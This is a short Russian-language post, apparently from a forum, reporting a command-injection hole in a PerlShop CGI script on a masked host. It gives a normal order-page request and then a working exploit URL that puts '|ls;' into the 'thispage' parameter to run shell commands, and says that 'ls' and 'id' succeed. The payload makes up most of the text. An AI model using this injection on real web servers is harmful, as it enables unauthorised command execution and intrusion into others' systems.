Уязвимость такого рода. Запрос обрабатывается таким образом:
http://www.xxx.com/cgibin/perlshop.cgi?ACTION= thispage&thispage=orderform.html&ORDER_ID=653976316
Нашел возможность выполнения команд:
http://www.xxx.com/cgibin/perlshop.cgi?ACTION= thispage&thispage=|ls;&ORDER_ID=653976316
открывает для просмотра содержимое директории /cgibin/,
так же возможно выполнение команды id.
Остальные команды вроде не работают.